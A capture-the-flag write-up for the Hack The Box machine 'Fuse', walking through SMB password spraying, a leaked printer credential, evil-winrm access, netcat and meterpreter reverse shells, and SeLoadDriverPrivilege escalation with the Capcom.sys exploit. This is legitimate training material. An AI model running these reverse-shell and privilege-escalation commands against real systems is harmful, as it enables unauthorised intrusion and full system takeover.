Fuse

HTB Writeup

Lets start with a Nmap Scan:

root@liberty:/home/kali# nmap -Pn -sC -sV fuse.htb
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for fuse.htb (10.129.2.5)
Host is up (0.022s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
80/tcp   open  http         Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-09 13:58:10Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/9%Time=5F8068D4%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Take notice to the domain :

Domain: fabricorp.local

Its at this point with most HTB Machines that I'll add the hostname to /etc/hosts

echo "X.X.X.X   fuse.fabricorp.local"  >> /etc/hosts
echo "X.X.X.X   fuse.htb"  >> /etc/hosts

Now lets enumerate the box with SMBClient & Enum4Linux:

kali@liberty:~$ enum4linux fuse.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct  9 09:46:19 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... fuse.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================ 
|    Enumerating Workgroup/Domain on fuse.htb    |
 ================================================ 
[E] Can't find workgroup/domain


 ======================================== 
|    Nbtstat Information for fuse.htb    |
 ======================================== 
Looking up status of 10.129.2.5
No reply from 10.129.2.5

kali@liberty:~$ smbclient -L fuse.htb
Enter WORKGROUP\kali's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

Now lets take a port 80. After adding our host's FQDN to our /etc/hosts file we should get this page:

After downloading and grepping the cvs files we now have the following usernames:

root@liberty:/home/kali# cat users.txt 
tlavel
sthompson
bhult
pmerton

Lets make a simple word list to accompany our newly found users. We can do this using cewl. CeWL is a tool which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

kali@liberty:~$ cewl -d 5 -m 3 -w wordlist http://fuse.htb/papercut/logs/html/index.htm --with-numbers 
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
kali@liberty:~$ cat wordlist 
Print
2020
PaperCut
MFT01
PCL6
Logs
LETTER
NOT
DUPLEX
GRAYSCALE
Logger
papercut
com
CSV
Excel
Notepad
http
www
Size
sthompson
May
LONWK019
...

To check these credentials against the SMB service using Metasploit:

msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist
pass_file => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set user
set user_as_pass   set user_file      set userpass_file  
msf5 auxiliary(scanner/smb/smb_login) > set user_file users.txt
user_file => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb
RHOSTS => fuse.htb
msf5 auxiliary(scanner/smb/smb_login) > run

Using this module we discover we have working creds!!!

[+] 10.129.2.5:445        - 10.129.2.5:445 - Success: '.\tlavel:Fabricorp01'
[+] 10.129.2.5:445        - 10.129.2.5:445 - Success: '.\bhult:Fabricorp01'

Lets circle back on our enumeration now that we have working creds!

root@liberty:/home/kali# smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\bhult's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

These creds worked in the metasploit module why arent they are working now? Just just go with the error message and change the password. We can to this with smbpasswd:

smbpasswdwww.samba.org

So there is a password policy enforced so I changed my password to Fabricorp02:

root@liberty:/home/kali# smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
machine fuse.htb rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
root@liberty:/home/kali# smbpasswd -r fuse.htb -U bhult
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult on fuse.htb.

root@liberty:/home/kali# smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\bhult's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Tried connecting over powershell but wasn't getting anywhere so I moved on to using rpcclinet, another great tool for enumeration.

PS /home/kali> New-PSSession -ComputerName fuse.htb -Credential tvlavel  

PowerShell credential request
Enter your credentials.
Password for user tvlavel: ************

New-PSSession: MI_RESULT_ACCESS_DENIED

Password Spraying & Other Fun with RPCCLIENT - Black Hills Information Security, Inc.Black Hills Information Security, Inc.

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb)
SeSystemtimePrivilege 		0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 		0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 		0:14 (0x0:0xe)
SeCreatePagefilePrivilege 		0:15 (0x0:0xf)
SeCreatePermanentPrivilege 		0:16 (0x0:0x10)
SeBackupPrivilege 		0:17 (0x0:0x11)
SeRestorePrivilege 		0:18 (0x0:0x12)
SeShutdownPrivilege 		0:19 (0x0:0x13)
SeDebugPrivilege 		0:20 (0x0:0x14)
SeAuditPrivilege 		0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 		0:22 (0x0:0x16)
SeChangeNotifyPrivilege 		0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 		0:24 (0x0:0x18)
SeUndockPrivilege 		0:25 (0x0:0x19)
SeSyncAgentPrivilege 		0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 		0:27 (0x0:0x1b)
SeManageVolumePrivilege 		0:28 (0x0:0x1c)
SeImpersonatePrivilege 		0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 		0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 		0:31 (0x0:0x1f)
SeRelabelPrivilege 		0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 		0:33 (0x0:0x21)
SeTimeZonePrivilege 		0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 		0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 		0:36 (0x0:0x24)

Lets take note to the new users we have discovered:

After running through most of the enumeration commands I came across this gem:

rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]

WE have now have another credential!

Since psh is out the window let use evil-winrm:

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents>

We can use these credentials to grab the user flag:

*Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
INSERT FLAG HERE

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Abusing SeLoadDriverPrivilege for privilege escalationTarlogic Security

Now that we access let grab a shell with netcat:

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb -s /home/kali/scripts

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> upload /usr/share/windows-resources/binaries/nc.exe
Info: Uploading /usr/share/windows-resources/binaries/nc.exe to C:\Users\svc-print\Documents\nc.exe

                                                             
Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print\Documents> nc.exe 10.10.14.34 443 -e cmd.exe
The term 'nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ nc.exe 10.10.14.34 443 -e cmd.exe
+ ~~~~~~
    + CategoryInfo          : ObjectNotFound: (nc.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-print\Documents> ./nc.exe 10.10.14.34 443 -e cmd.exe

root@liberty:/home/kali# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.34] from (UNKNOWN) [10.129.2.5] 63136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-print\Documents>

Lets begin our privilege escalation question with Windows Exploit Suggester - Next Generation (WES-NG) :

C:\Users\svc-print\Documents>systeminfo.exe > info.txt
systeminfo.exe > info.txt
Access is denied.

Or lets not.

Lets get a meterpreter shell up there while we are at it:

kali@liberty:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.34 LPORT=4444 -f dll shell.dll > shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of dll file: 5120 bytes

*Evil-WinRM* PS C:\Users\svc-print\Documents> upload shell.exe
Info: Uploading shell.exe to C:\Users\svc-print\Documents\shell.exe

                                                             
Data: 98400 bytes of 98400 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print\Documents> dir


    Directory: C:\Users\svc-print\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/9/2020  10:16 AM          73802 shell.exe
-a----        10/9/2020  10:01 AM          16664 Sherlock.ps1

Next you'll want to create a resource file to quickly launch your handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

root@liberty:/home/kali# msfconsole -r shell.rc

*] Processing shell.rc for ERB directives.
resource (shell.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (shell.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (shell.rc)> set LHOST 10.10.14.34
LHOST => 10.10.14.34
resource (shell.rc)> set LPORT 4444
LPORT => 4444
resource (shell.rc)> set ExitOnSession false
ExitOnSession => false
resource (shell.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.34:4444 
msf5 exploit(multi/handler) >

We now have the ability to interact with the host via a netcat shell or a meterpreter session.

Now lets get back to our privilege escalation:

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

The article mentions these PoC codes

GitHub - tandasat/ExploitCapcom: This is a standalone exploit for a vulnerable feature in Capcom.sysGitHub

GitHub - TarlogicSecurity/EoPLoadDriver: Proof of concept for abusing SeLoadDriverPrivilege (Privilege Escalation in Windows)GitHub

Lets download that and compile them on our Kali machine:

root@liberty:/opt/EoPLoadDriver# x86_64-w64-mingw32-gcc eoploaddriver.cpp -o poc.exe

Now we can reconnect to our machine, upload the exploit and root the box:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd C:\Temp
*Evil-WinRM* PS C:\Temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
*Evil-WinRM* PS C:\Temp> .\ExploitCapcom_shell.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000002138D100008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

root@liberty:/home/kali/SeLoadDriverPrivilege# nc -nvlp 445
listening on [any] 445 ...
connect to [10.10.14.45] from (UNKNOWN) [10.129.2.5] 50946
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Temp>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
INSERT FLAG HERE

C:\Users\Administrator\Desktop>

PreviousProxmark 3 NextBlunder

Last updated 5 years ago